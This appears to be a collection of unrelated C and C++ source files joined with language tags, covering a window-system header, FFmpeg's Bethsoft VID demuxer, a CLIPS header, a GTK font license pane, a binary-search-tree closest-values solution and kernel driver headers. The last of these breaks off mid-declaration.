//< If not null - signalled on new event in win q tid_t owner; #if !VIDEO_T_IN_D struct drv_video_window *w_title; //< Child window - title #endif struct drv_video_window *w_decor; //< Child window - decorations struct drv_video_window *w_owner; //< My parent window - i am decor/title pool_t *controls; //< Attached UI controls taskbar_handle_t task_bar_h; //< Me it task bar window_handle_t context_menu; //< Default window context menu rgba_t *r_pixel; //< read ptr - for blit to screen rgba_t *w_pixel; //< write ptr - for painting rgba_t *buf[2]; //< 1st/2nd halves ptrs for dbl buf switch #if VIDEO_DOUBLE_BUF #else //#define r_pixel pixels //#define w_pixel pixels #endif // bitmap itself rgba_t *bitmap; } drv_video_window_t; // returns nonzero if rect is out of window int rect_win_bounds( rect_t *r, drv_video_window_t *w ); // returns nonzero if point is in window int point_in_win( int x, int y, drv_video_window_t *w ); // ------------------------------------------------------------------------ // Window interface // ------------------------------------------------------------------------ //! malloc value to create drv_video_window_t // * 2 is for double buffered mode static __inline__ int drv_video_window_bytes( int xsize, int ysize ) { return (sizeof(rgba_t) * xsize * ysize * 2) + sizeof(drv_video_window_t); } // dynamic allocation drv_video_window_t *drv_video_window_create(int xsize, int ysize, int x, int y, rgba_t bg, const char* title, int flags ); // free dynamically allocated window void drv_video_window_free(drv_video_window_t *w); // init for statically allocated ones void drv_video_window_init( drv_video_window_t *w, void *pixels, int xsize, int ysize, int x, int y, rgba_t bg, int flags, const char *title ); // destroy for statically allocated ones void drv_video_window_destroy(drv_video_window_t *w); void w_to_top(window_handle_t w); void w_to_bottom(window_handle_t w); void w_clear( window_handle_t win ); void w_fill( window_handle_t win, rgba_t color ); void w_draw_rect( window_handle_t win, rgba_t color, rect_t r ); void w_fill_rect( window_handle_t win, rgba_t color, rect_t r ); //#define w_draw_pixel w_pixel void w_draw_pixel( window_handle_t w, int x, int y, rgba_t color ); void w_draw_line( window_handle_t w, int x1, int y1, int x2, int y2, rgba_t c); void w_fill_ellipse( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_fill_box( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_draw_box( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_draw_bitmap( window_handle_t w, int x, int y, drv_video_bitmap_t *bmp ); void w_draw_blend_bitmap( drv_video_window_t *w, int x, int y, drv_video_bitmap_t *bmp ); //< Draw with alpha blending void w_move( window_handle_t w, int x, int y ); errno_t w_scroll_hor( window_handle_t w, int x, int y, int xs, int ys, int s ); void w_scroll_up( window_handle_t win, int npix, rgba_t color); void w_set_title( window_handle_t w, const char *title ); void w_get_bounds( window_handle_t w, rect_t *out ); void w_set_visible( window_handle_t h, int v ); void w_set_bg_color( window_handle_t w, rgba_t color ); /** * * Resize window - tricky! * * Warning - caller must check buffer size! * * It is up to caller to be sure that window has enough * place in its allocated memory for new size. If it is * not so, caller must allocate and pass new buffer. * * Use drv_video_window_bytes() to find correct size of * video memory for window, add sizeof(window_handle_t) * * \param[in] w Window to resize * \param[in] xsize New width * \param[in] ysize New height * \param[in] new_buffer Zero if old memory is big enough for a new size, or new buffer. * \param[in] clear Do not attempt to save contents, clear with bg color. * **/ void w_resize_ext( window_handle_t w, int xsize, int ysize, void *new_buffer, int clear ); // ----------------------------------------------------------------------- // Getters for state // ----------------------------------------------------------------------- #define w_is_in_focus(w) ({ ((w)->state) & WSTATE_WIN_FOCUSED; }) #define w_is_visible(w) ({ ((w)->state) & WSTATE_WIN_VISIBLE; }) /// Is one of topmost - i.e. covered only by WFLAG_WIN_ONTOP ones int w_is_top(drv_video_window_t *w); // ----------------------------------------------------------------------- // Globals - TODO move away // ----------------------------------------------------------------------- extern queue_head_t allwindows; extern window_handle_t focused_window; // ----------------------------------------------------------------------- // Task bar // ----------------------------------------------------------------------- /** * * Add window to task bar. Task bar will control window visibility. * Also, application can control image in task bar by changing * task bar icon with w_set_task_bar_icon. * **/ taskbar_handle_t w_add_to_task_bar( window_handle_t w ); taskbar_handle_t w_add_to_task_bar_icon( window_handle_t w, drv_video_bitmap_t *icon ); taskbar_handle_t w_add_to_task_bar_ext( window_handle_t w, drv_video_bitmap_t *icon, drv_video_bitmap_t *n_bmp, drv_video_bitmap_t *p_bmp, drv_video_bitmap_t *h_bmp ); void w_set_task_bar_icon( window_handle_t w, drv_video_bitmap_t *bmp ); //! Not impl yet - displays a marker with a number aside to icon top void w_set_task_bar_note( window_handle_t w, int n_of_outstanding_events ); //void w_set_task_bar_menu( window_handle_t w, window_handle_t m ); errno_t w_remove_from_task_bar( window_handle_t w ); /// Add marker in taskbar telling that window needs attention void w_add_notification( window_handle_t w, int count_to_add ); /// Remove marker. Also automativally called on bringing window to top void w_reset_notification( window_handle_t w ); void w_set_task_bar_menu( window_handle_t w, window_handle_t m ); // ----------------------------------------------------------------------- // Internals // ----------------------------------------------------------------------- window_handle_t drv_video_next_window(window_handle_t curr); void win2blt_flags( u_int32_t *flags, const window_handle_t w ); // ----------------------------------------------------------------------- // Persistent mem support // ----------------------------------------------------------------------- //! Called from object restart code to reinit window struct //! contained in VM object. This func just clears pointers. //! After calling this func you must reset all the required //! fields and call w_restart_attach( w ) //! to add window to in-kernel lists and repaint it. void w_restart_init(window_handle_t w, void *pixels); // Called from vm restart code to reattach window to win system void w_restart_attach( window_handle_t w ); // Get most bottom (background) window. Used to set scrren background pic. window_handle_t w_get_bg_window(void); // ----------------------------------------------------------------------- // Legacy? // ----------------------------------------------------------------------- #if !NEW_WINDOWS void w_update( drv_video_window_t *w ); #if !USE_ONLY_INDIRECT_PAINT void drv_video_winblt( drv_video_window_t *from ); #endif // USE_ONLY_INDIRECT_PAINT int w_titleWindowEventProcessor( window_handle_t w, struct ui_event *e ); /** * * Replicates src to dest. src has one horiz. line of srcSize pixels. * nSteps is number of replication steps vertically. * **/ void w_replicate_ver( window_handle_t dest, int destX, int destY, int nSteps, const rgba_t *src, int srcSize ); /** * * Replicates src to dest. src has one vert. line of srcSize pixels. * nSteps is number of times to draw src horizontally. * **/ void w_replicate_hor( window_handle_t dest, int destX, int destY, int nSteps, const rgba_t *src, int srcSize ); void window_basic_border( window_handle_t dest, const rgba_t *src, int srcSize, int isTitle ); #endif void w_repaint_screen_part( drv_video_window_t *w, rect_t *todo ); #if 0 #if NEW_WINDOWS typedef pool_handle_t window_handle_t; // ----------------------------------------------------------------------- // New windows attempt - outdated // ----------------------------------------------------------------------- typedef struct _phantom_window { int xsize; // physical int ysize; int x, y, z; // On screen int dx, dy; // Drag base (see titleMouseEventProcessor) //int unused_generation; // used to redraw self and borders on global events int flags; // Not supposed to change during window's life int state; // Can change anytime //queue_chain_t chain; // All windows are on this chain int li, ti, ri, bi; // insets rgba_t bg; // background color const char* title; //queue_head_t events; // Incoming events //volatile int events_count; // To prevent overfill of dead window q int stall; // True if event queue is overloaded and events are being lost /*! * Called from main event dispatch thread after event is placed to * window event queue. Supposed to process event or trigger waiting * thread to do that. */ int (*inKernelEventProcess)( window_handle_t, struct ui_event *e ); tid_t owner; //pool_handle_t w_title; // child window - title //pool_handle_t w_decor; // child window - decorations //pool_handle_t w_owner; // my parent window // bitmap itself rgba_t *pixel; } window_t; pool_handle_t w_create( int xsize, int ysize ); void w_blt( pool_handle_t h ); void w_draw_h_line( window_handle_t h, rgba_t color, int x, int y, int len ); void w_draw_v_line( window_handle_t h, rgba_t color, int x, int y, int len ); //void w_moveto( pool_handle_t h, int x, int y ); //void w_pixel( pool_handle_t h, int x, int y, rgba_t color ); #endif #endif #endif // WINDOW_H
{ "language": "C" }
/* * Bethsoft VID format Demuxer * Copyright (c) 2007 Nicholas Tung * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /** * @file * @brief Bethesda Softworks VID (.vid) file demuxer * @author Nicholas Tung [ntung (at. ntung com] (2007-03) * @see http://wiki.multimedia.cx/index.php?title=Bethsoft_VID * @see http://www.svatopluk.com/andux/docs/dfvid.html */ #include "libavutil/channel_layout.h" #include "libavutil/intreadwrite.h" #include "avformat.h" #include "internal.h" #include "libavcodec/bethsoftvideo.h" #define BVID_PALETTE_SIZE 3 * 256 #define DEFAULT_SAMPLE_RATE 11111 typedef struct BVID_DemuxContext { int nframes; int sample_rate; /**< audio sample rate */ int width; /**< video width */ int height; /**< video height */ /** delay value between frames, added to individual frame delay. * custom units, which will be added to other custom units (~=16ms according * to free, unofficial documentation) */ int bethsoft_global_delay; int video_index; /**< video stream index */ int audio_index; /**< audio stream index */ int has_palette; uint8_t palette[BVID_PALETTE_SIZE]; int is_finished; } BVID_DemuxContext; static int vid_probe(const AVProbeData *p) { // little-endian VID tag, file starts with "VID\0" if (AV_RL32(p->buf) != MKTAG('V', 'I', 'D', 0)) return 0; if (p->buf[4] != 2) return AVPROBE_SCORE_MAX / 4; return AVPROBE_SCORE_MAX; } static int vid_read_header(AVFormatContext *s) { BVID_DemuxContext *vid = s->priv_data; AVIOContext *pb = s->pb; /* load main header. Contents: * bytes: 'V' 'I' 'D' * int16s: always_512, nframes, width, height, delay, always_14 */ avio_skip(pb, 5); vid->nframes = avio_rl16(pb); vid->width = avio_rl16(pb); vid->height = avio_rl16(pb); vid->bethsoft_global_delay = avio_rl16(pb); avio_rl16(pb); // wait until the first packet to create each stream vid->video_index = -1; vid->audio_index = -1; vid->sample_rate = DEFAULT_SAMPLE_RATE; s->ctx_flags |= AVFMTCTX_NOHEADER; return 0; } #define BUFFER_PADDING_SIZE 1000 static int read_frame(BVID_DemuxContext *vid, AVIOContext *pb, AVPacket *pkt, uint8_t block_type, AVFormatContext *s) { uint8_t * vidbuf_start = NULL; int vidbuf_nbytes = 0; int code; int bytes_copied = 0; int position, duration, npixels; unsigned int vidbuf_capacity; int ret = 0; AVStream *st; if (vid->video_index < 0) { st = avformat_new_stream(s, NULL); if (!st) return AVERROR(ENOMEM); vid->video_index = st->index; if (vid->audio_index < 0) { avpriv_request_sample(s, "Using default video time base since " "having no audio packet before the first " "video packet"); } avpriv_set_pts_info(st, 64, 185, vid->sample_rate); st->codecpar->codec_type = AVMEDIA_TYPE_VIDEO; st->codecpar->codec_id = AV_CODEC_ID_BETHSOFTVID; st->codecpar->width = vid->width; st->codecpar->height = vid->height; } st = s->streams[vid->video_index]; npixels = st->codecpar->width * st->codecpar->height; vidbuf_start = av_malloc(vidbuf_capacity = BUFFER_PADDING_SIZE); if(!vidbuf_start) return AVERROR(ENOMEM); // save the file position for the packet, include block type position = avio_tell(pb) - 1; vidbuf_start[vidbuf_nbytes++] = block_type; // get the current packet duration duration = vid->bethsoft_global_delay + avio_rl16(pb); // set the y offset if it exists (decoder header data should be in data section) if(block_type == VIDEO_YOFF_P_FRAME){ if (avio_read(pb, &vidbuf_start[vidbuf_nbytes], 2) != 2) { ret = AVERROR(EIO); goto fail; } vidbuf_nbytes += 2; } do{ uint8_t *tmp = av_fast_realloc(vidbuf_start, &vidbuf_capacity, vidbuf_nbytes + BUFFER_PADDING_SIZE); if (!tmp) { ret = AVERROR(ENOMEM); goto fail; } vidbuf_start = tmp; code = avio_r8(pb); vidbuf_start[vidbuf_nbytes++] = code; if(code >= 0x80){ // rle sequence if(block_type == VIDEO_I_FRAME) vidbuf_start[vidbuf_nbytes++] = avio_r8(pb); } else if(code){ // plain sequence if (avio_read(pb, &vidbuf_start[vidbuf_nbytes], code) != code) { ret = AVERROR(EIO); goto fail; } vidbuf_nbytes += code; } bytes_copied += code & 0x7F; if(bytes_copied == npixels){ // sometimes no stop character is given, need to keep track of bytes copied // may contain a 0 byte even if read all pixels if(avio_r8(pb)) avio_seek(pb, -1, SEEK_CUR); break; } if (bytes_copied > npixels) { ret = AVERROR_INVALIDDATA; goto fail; } } while(code); // copy data into packet if ((ret = av_new_packet(pkt, vidbuf_nbytes)) < 0) goto fail; memcpy(pkt->data, vidbuf_start, vidbuf_nbytes); pkt->pos = position; pkt->stream_index = vid->video_index; pkt->duration = duration; if (block_type == VIDEO_I_FRAME) pkt->flags |= AV_PKT_FLAG_KEY; /* if there is a new palette available, add it to packet side data */ if (vid->has_palette) { uint8_t *pdata = av_packet_new_side_data(pkt, AV_PKT_DATA_PALETTE, BVID_PALETTE_SIZE); if (!pdata) { ret = AVERROR(ENOMEM); av_log(s, AV_LOG_ERROR, "Failed to allocate palette side data\n"); goto fail; } memcpy(pdata, vid->palette, BVID_PALETTE_SIZE); vid->has_palette = 0; } vid->nframes--; // used to check if all the frames were read fail: av_free(vidbuf_start); return ret; } static int vid_read_packet(AVFormatContext *s, AVPacket *pkt) { BVID_DemuxContext *vid = s->priv_data; AVIOContext *pb = s->pb; unsigned char block_type; int audio_length; int ret_value; if(vid->is_finished || avio_feof(pb)) return AVERROR_EOF; block_type = avio_r8(pb); switch(block_type){ case PALETTE_BLOCK: if (vid->has_palette) { av_log(s, AV_LOG_WARNING, "discarding unused palette\n"); vid->has_palette = 0; } if (avio_read(pb, vid->palette, BVID_PALETTE_SIZE) != BVID_PALETTE_SIZE) { return AVERROR(EIO); } vid->has_palette = 1; return vid_read_packet(s, pkt); case FIRST_AUDIO_BLOCK: avio_rl16(pb); // soundblaster DAC used for sample rate, as on specification page (link above) vid->sample_rate = 1000000 / (256 - avio_r8(pb)); case AUDIO_BLOCK: if (vid->audio_index < 0) { AVStream *st = avformat_new_stream(s, NULL); if (!st) return AVERROR(ENOMEM); vid->audio_index = st->index; st->codecpar->codec_type = AVMEDIA_TYPE_AUDIO; st->codecpar->codec_id = AV_CODEC_ID_PCM_U8; st->codecpar->channels = 1; st->codecpar->channel_layout = AV_CH_LAYOUT_MONO; st->codecpar->bits_per_coded_sample = 8; st->codecpar->sample_rate = vid->sample_rate; st->codecpar->bit_rate = 8 * st->codecpar->sample_rate; st->start_time = 0; avpriv_set_pts_info(st, 64, 1, vid->sample_rate); } audio_length = avio_rl16(pb); if ((ret_value = av_get_packet(pb, pkt, audio_length)) != audio_length) { if (ret_value < 0) return ret_value; av_log(s, AV_LOG_ERROR, "incomplete audio block\n"); return AVERROR(EIO); } pkt->stream_index = vid->audio_index; pkt->duration = audio_length; pkt->flags |= AV_PKT_FLAG_KEY; return 0; case VIDEO_P_FRAME: case VIDEO_YOFF_P_FRAME: case VIDEO_I_FRAME: return read_frame(vid, pb, pkt, block_type, s); case EOF_BLOCK: if(vid->nframes != 0) av_log(s, AV_LOG_VERBOSE, "reached terminating character but not all frames read.\n"); vid->is_finished = 1; return AVERROR(EIO); default: av_log(s, AV_LOG_ERROR, "unknown block (character = %c, decimal = %d, hex = %x)!!!\n", block_type, block_type, block_type); return AVERROR_INVALIDDATA; } } AVInputFormat ff_bethsoftvid_demuxer = { .name = "bethsoftvid", .long_name = NULL_IF_CONFIG_SMALL("Bethesda Softworks VID"), .priv_data_size = sizeof(BVID_DemuxContext), .read_probe = vid_probe, .read_header = vid_read_header, .read_packet = vid_read_packet, };
{ "language": "C" }
/*******************************************************/ /* "C" Language Integrated Production System */ /* */ /* CLIPS Version 6.24 06/05/06 */ /* */ /* INCREMENTAL RESET HEADER FILE */ /*******************************************************/ /*************************************************************/ /* Purpose: Provides functionality for the incremental */ /* reset of the pattern and join networks when a new */ /* rule is added. */ /* */ /* Principal Programmer(s): */ /* Gary D. Riley */ /* */ /* Contributing Programmer(s): */ /* */ /* Revision History: */ /* */ /* 6.24: Renamed BOOLEAN macro type to intBool. */ /* */ /*************************************************************/ #ifndef _H_incrrset #define _H_incrrset #ifndef _H_ruledef #include "ruledef.h" #endif #ifdef LOCALE #undef LOCALE #endif #ifdef _INCRRSET_SOURCE_ #define LOCALE #else #define LOCALE extern #endif #if ENVIRONMENT_API_ONLY #define GetIncrementalReset(theEnv) EnvGetIncrementalReset(theEnv) #define SetIncrementalReset(theEnv,a) EnvSetIncrementalReset(theEnv,a) #else #define GetIncrementalReset() EnvGetIncrementalReset(GetCurrentEnvironment()) #define SetIncrementalReset(a) EnvSetIncrementalReset(GetCurrentEnvironment(),a) #endif LOCALE void IncrementalReset(void *,struct defrule *); LOCALE intBool EnvGetIncrementalReset(void *); LOCALE intBool EnvSetIncrementalReset(void *,intBool); LOCALE int GetIncrementalResetCommand(void *); LOCALE int SetIncrementalResetCommand(void *); #endif
{ "language": "C" }
/* font-manager-license-pane.c * * Copyright (C) 2009 - 2020 Jerry Casiano * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. * * If not, see <http://www.gnu.org/licenses/gpl-3.0.txt>. */ #include "font-manager-license-pane.h" /** * SECTION: font-manager-license-pane * @short_description: Font licensing details * @title: License Pane * @include: font-manager-license-pane.h * * Widget which displays embedded or detected font licensing data. */ struct _FontManagerLicensePane { GtkEventBox parent_instance; gint _fsType; GtkWidget *fsType; GtkWidget *license_data; GtkWidget *license_url; GtkWidget *placeholder; }; G_DEFINE_TYPE(FontManagerLicensePane, font_manager_license_pane, GTK_TYPE_EVENT_BOX) enum { PROP_RESERVED, PROP_FSTYPE, PROP_LICENSE_DATA, PROP_LICENSE_URL, N_PROPERTIES }; static GParamSpec *obj_properties[N_PROPERTIES] = { NULL, }; static void font_manager_license_pane_get_property (GObject *gobject, guint property_id, GValue *value, GParamSpec *pspec) { g_return_if_fail(gobject != NULL); FontManagerLicensePane *self = FONT_MANAGER_LICENSE_PANE(gobject); g_autofree gchar *data = NULL; switch (property_id) { case PROP_FSTYPE: g_value_set_enum(value, self->_fsType); break; case PROP_LICENSE_DATA: data = font_manager_license_pane_get_license_data(self); g_value_set_string(value, data); break; case PROP_LICENSE_URL: data = font_manager_license_pane_get_license_url(self); g_value_set_string(value, data); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID(gobject, property_id, pspec); } return; } static void font_manager_license_pane_set_property (GObject *gobject, guint property_id, const GValue *value, GParamSpec *pspec) { g_return_if_fail(gobject != NULL); FontManagerLicensePane *self = FONT_MANAGER_LICENSE_PANE(gobject); switch (property_id) { case PROP_FSTYPE: font_manager_license_pane_set_fsType(self, g_value_get_int(value)); break; case PROP_LICENSE_DATA: font_manager_license_pane_set_license_data(self, g_value_get_string(value)); break; case PROP_LICENSE_URL: font_manager_license_pane_set_license_url(self, g_value_get_string(value)); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID(gobject, property_id, pspec); } return; } static void font_manager_license_pane_class_init (FontManagerLicensePaneClass *klass) { GObjectClass *object_class = G_OBJECT_CLASS(klass); object_class->get_property = font_manager_license_pane_get_property; object_class->set_property = font_manager_license_pane_set_property; /** * FontManagerLicensePane:fstype: * * Font embedding information */ obj_properties[PROP_FSTYPE] = g_param_spec_int("fstype", NULL, "Font embedding information", G_MININT, G_MAXINT, 0, G_PARAM_STATIC_STRINGS | G_PARAM_READWRITE | G_PARAM_EXPLICIT_NOTIFY); /** * FontManagerLicensePane:license-data: * * Embedded or detected license text */ obj_properties[PROP_LICENSE_DATA] = g_param_spec_string("license-data", NULL, "Embedded or detected license text", NULL, G_PARAM_STATIC_STRINGS | G_PARAM_READWRITE | G_PARAM_EXPLICIT_NOTIFY); /** * FontManagerLicensePane:license-url: * * Embedded or detected license url */ obj_properties[PROP_LICENSE_URL] = g_param_spec_string("license-url", NULL, "Embedded or detected license url", NULL, G_PARAM_STATIC_STRINGS | G_PARAM_READWRITE | G_PARAM_EXPLICIT_NOTIFY); g_object_class_install_properties(object_class, N_PROPERTIES, obj_properties); return; } static gboolean on_event (GtkWidget *widget, GdkEvent *event, G_GNUC_UNUSED gpointer user_data) { g_return_val_if_fail(widget != NULL, GDK_EVENT_PROPAGATE); g_return_val_if_fail(event != NULL, GDK_EVENT_PROPAGATE); if (event->type == GDK_SCROLL) return GDK_EVENT_PROPAGATE; GdkWindow *text_window = gtk_text_view_get_window(GTK_TEXT_VIEW(widget), GTK_TEXT_WINDOW_TEXT); gdk_window_set_cursor(text_window, NULL); return GDK_EVENT_STOP; } static void font_manager_license_pane_init (FontManagerLicensePane *self) { g_return_if_fail(self != NULL); GtkStyleContext *ctx = gtk_widget_get_style_context(GTK_WIDGET(self)); gtk_style_context_add_class(ctx, GTK_STYLE_CLASS_VIEW); gtk_widget_set_name(GTK_WIDGET(self), "FontManagerLicensePane"); self->fsType = gtk_label_new(NULL); PangoAttrList *attrs = pango_attr_list_new(); PangoAttribute *attr = pango_attr_weight_new(PANGO_WEIGHT_BOLD); pango_attr_list_insert(attrs, attr); gtk_label_set_attributes(GTK_LABEL(self->fsType), attrs); g_clear_pointer(&attrs, pango_attr_list_unref); gtk_widget_set_opacity(self->fsType, 0.55); const gchar *msg = _("File does not contain license information."); self->placeholder = font_manager_place_holder_new(NULL, NULL, msg, "dialog-question-symbolic"); font_manager_widget_set_expand(self->placeholder, TRUE); font_manager_widget_set_margin(self->placeholder, FONT_MANAGER_DEFAULT_MARGIN * 4); gtk_widget_set_halign(self->placeholder, GTK_ALIGN_CENTER); gtk_widget_set_valign(self->placeholder, GTK_ALIGN_START); self->license_data = gtk_text_view_new(); gtk_drag_dest_unset(self->license_data); g_signal_connect(self->license_data, "event", G_CALLBACK(on_event), NULL); self->license_url = gtk_link_button_new(""); GtkWidget *overlay = gtk_overlay_new(); gtk_overlay_add_overlay(GTK_OVERLAY(overlay), self->placeholder); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW(self->license_data), GTK_WRAP_WORD_CHAR); gtk_text_view_set_editable(GTK_TEXT_VIEW(self->license_data), FALSE); font_manager_widget_set_margin(self->fsType, FONT_MANAGER_DEFAULT_MARGIN * 2); font_manager_widget_set_margin(self->license_url, FONT_MANAGER_DEFAULT_MARGIN * 1.25); GtkWidget *scroll = gtk_scrolled_window_new(NULL, NULL); gtk_container_add(GTK_CONTAINER(scroll), self->license_data); font_manager_widget_set_expand(scroll, TRUE); font_manager_widget_set_margin(self->license_data, FONT_MANAGER_DEFAULT_MARGIN * 2); GtkWidget *box = gtk_box_new(GTK_ORIENTATION_VERTICAL, 2); gtk_box_pack_start(GTK_BOX(box), self->fsType, FALSE, FALSE, 0); gtk_container_add(GTK_CONTAINER(overlay), scroll); gtk_box_pack_start(GTK_BOX(box), overlay, TRUE, TRUE, 0); gtk_box_pack_end(GTK_BOX(box), self->license_url, FALSE, FALSE, 0); gtk_container_add(GTK_CONTAINER(self), box); gtk_widget_show(scroll); gtk_widget_show(self->fsType); gtk_widget_show(self->license_data); gtk_widget_show(self->license_url); gtk_widget_show(self->placeholder); gtk_widget_show(overlay); gtk_widget_show(box); return; } /** * font_manager_license_pane_get_fsType: * @self: #FontManagerLicensePane * * Returns: #FontManagerfsType */ gint font_manager_license_pane_get_fsType (FontManagerLicensePane *self) { g_return_val_if_fail(self != NULL, 0); return self->_fsType; } /** * font_manager_license_pane_get_license_data: * @self: #FontManagerLicensePane * * Returns: (transfer none) (nullable): * A newly allocated string that must be freed with #g_free or %NULL */ gchar * font_manager_license_pane_get_license_data (FontManagerLicensePane *self) { g_return_val_if_fail(self != NULL, NULL); GtkTextBuffer *buffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW(self->license_data)); GtkTextIter start, end; gtk_text_buffer_get_bounds(buffer, &start, &end); return gtk_text_buffer_get_text(buffer, &start, &end, FALSE); } /** * font_manager_license_pane_get_license_url: * @self: #FontManagerLicensePane * * Returns: (transfer none) (nullable): * A newly allocated string that must be freed with #g_free or %NULL */ gchar * font_manager_license_pane_get_license_url (FontManagerLicensePane *self) { g_return_val_if_fail(self != NULL, NULL); return g_strdup(gtk_link_button_get_uri(GTK_LINK_BUTTON(self->license_url))); } /** * font_manager_license_pane_set_fsType: * @self: #FontManagerLicensePane * @fstype: #FontManagerfsType */ void font_manager_license_pane_set_fsType (FontManagerLicensePane *self, gint fstype) { g_return_if_fail(self != NULL); self->_fsType = fstype; gtk_label_set_label(GTK_LABEL(self->fsType), font_manager_fsType_to_string(fstype)); return; } /** * font_manager_license_pane_set_license_data: * @self: #FontManagerLicensePane * @license_data: (nullable): License data embedded in font file or %NULL */ void font_manager_license_pane_set_license_data (FontManagerLicensePane *self, const gchar *license_data) { g_return_if_fail(self != NULL); GtkTextBuffer *buffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW(self->license_data)); gtk_text_buffer_set_text(buffer, license_data ? license_data : "", -1); gtk_widget_set_visible(self->placeholder, license_data == NULL); return; } /** * font_manager_license_pane_set_license_url: * @self: #FontManagerLicensePane * @url: (nullable): URL to latest version of license or %NULL */ void font_manager_license_pane_set_license_url (FontManagerLicensePane *self, const gchar *url) { g_return_if_fail(self != NULL); gtk_button_set_label(GTK_BUTTON(self->license_url), url); gtk_link_button_set_uri(GTK_LINK_BUTTON(self->license_url), url ? url : ""); gtk_widget_set_visible(self->license_url, url != NULL); return; } /** * font_manager_license_pane_new: * * Returns: (transfer full): A newly created #FontManagerLicensePane. * Free the returned object using #g_object_unref(). */ GtkWidget * font_manager_license_pane_new (void) { return g_object_new(FONT_MANAGER_TYPE_LICENSE_PANE, NULL); }
{ "language": "C" }
/** * Definition for a binary tree node. * struct TreeNode { * int val; * TreeNode *left; * TreeNode *right; * TreeNode(int x) : val(x), left(NULL), right(NULL) {} * }; */ // O(k) amortized. class Solution { public: string s(TreeNode* u) { if (u == nullptr) { return "null"; } else { stringstream sin; sin << u->val; return sin.str(); } } vector<int> closestKValues(TreeNode* root, double target, int k) { vector<int> answer; TreeNode* left = find1(root, target, nullptr); TreeNode* right = find2(root, target, nullptr); //cout << "right: " << s(right) << endl; //cout << "parent(right) = " << s(parent[right]) << endl; //cout << s(prev(left)) << " " << s(left) << " " << s(right) << " " << s(next(right)) << endl; while (answer.size() < k) { assert(left != nullptr || right != nullptr); if (left == nullptr) { answer.push_back(right->val); right = next(right); continue; } if (right == nullptr) { answer.push_back(left->val); left = prev(left); continue; } // Both not null if (target - left->val < right->val - target) { answer.push_back(left->val); left = prev(left); } else { answer.push_back(right->val); right = next(right); } } return answer; } // Find largest element <= target TreeNode* find1(TreeNode* u, double target, TreeNode* p) { if (u == nullptr) return nullptr; parent[u] = p; if (u->val > target) { return find1(u->left, target, u); } else { assert(u->val <= target); // I could be the largest element unless there is one on my right side. TreeNode* r = find1(u->right, target, u); return r != nullptr ? r : u; } } // Find smallest element > target TreeNode* find2(TreeNode* u, double target, TreeNode* p) { if (u == nullptr) return nullptr; parent[u] = p; if (u->val <= target) { return find2(u->right, target, u); } else { assert(u->val > target); // I could be the smallest element unless there is one on my left. TreeNode* l = find2(u->left, target, u); return l != nullptr ? l : u; } } // Finds leftmost element in subtree rooted at u. TreeNode* leftmost(TreeNode* u) { while (u->left != nullptr) { parent[u->left] = u; u = u->left; } return u; } // Finds rightmost element in subtree rooted at u. TreeNode* rightmost(TreeNode* u) { while (u->right != nullptr) { parent[u->right] = u; u = u->right; } return u; } // Finds immediately next element in tree. TreeNode* next(TreeNode* u) { if (u == nullptr) return nullptr; if (u->right != nullptr) { parent[u->right] = u; return leftmost(u->right); } // Go up and to the left as much as I want while (parent[u] != nullptr && parent[u]->right == u) { u = parent[u]; } // Then go once up and to the right if (parent[u] != nullptr && parent[u]->left == u) { return parent[u]; } return nullptr; } // Finds immediately previous element in tree. TreeNode* prev(TreeNode* u) { if (u == nullptr) return nullptr; if (u->left != nullptr) { parent[u->left] = u; return rightmost(u->left); } // Go up and to the left as much as I want while (parent[u] != nullptr && parent[u]->left == u) { u = parent[u]; } // Then go once up and to the left if (parent[u] != nullptr && parent[u]->right == u) { return parent[u]; } return nullptr; } private: unordered_map<TreeNode*, TreeNode*> parent; };
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 OR MIT */ /* Copyright 2018-2019 Qiang Yu <yuq825@gmail.com> */ #ifndef __LIMA_BCAST_H__ #define __LIMA_BCAST_H__ struct lima_ip; int lima_bcast_resume(struct lima_ip *ip); void lima_bcast_suspend(struct lima_ip *ip); int lima_bcast_init(struct lima_ip *ip); void lima_bcast_fini(struct lima_ip *ip); void lima_bcast_enable(struct lima_device *dev, int num_pp); #endif
{ "language": "C" }
/* * ifile.h - NILFS inode file * * Copyright (C) 2006-2008 Nippon Telegraph and Telephone Corporation. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA * * Written by Amagai Yoshiji <amagai@osrg.net> * Revised by Ryusuke Konishi <ryusuke@osrg.net> * */ #ifndef _NILFS_IFILE_H #define _NILFS_IFILE_H #include <linux/fs.h> #include <linux/buffer_head.h> #include <linux/nilfs2_fs.h> #include "mdt.h" #include "alloc.h" static inline struct nilfs_inode * nilfs_ifile_map_inode(struct inode *ifile, ino_t ino, struct buffer_head *ibh) { void *kaddr = kmap(ibh->b_page); return nilfs_palloc_block_get_entry(ifile, ino, ibh, kaddr); } static inline void nilfs_ifile_unmap_inode(struct inode *ifile, ino_t 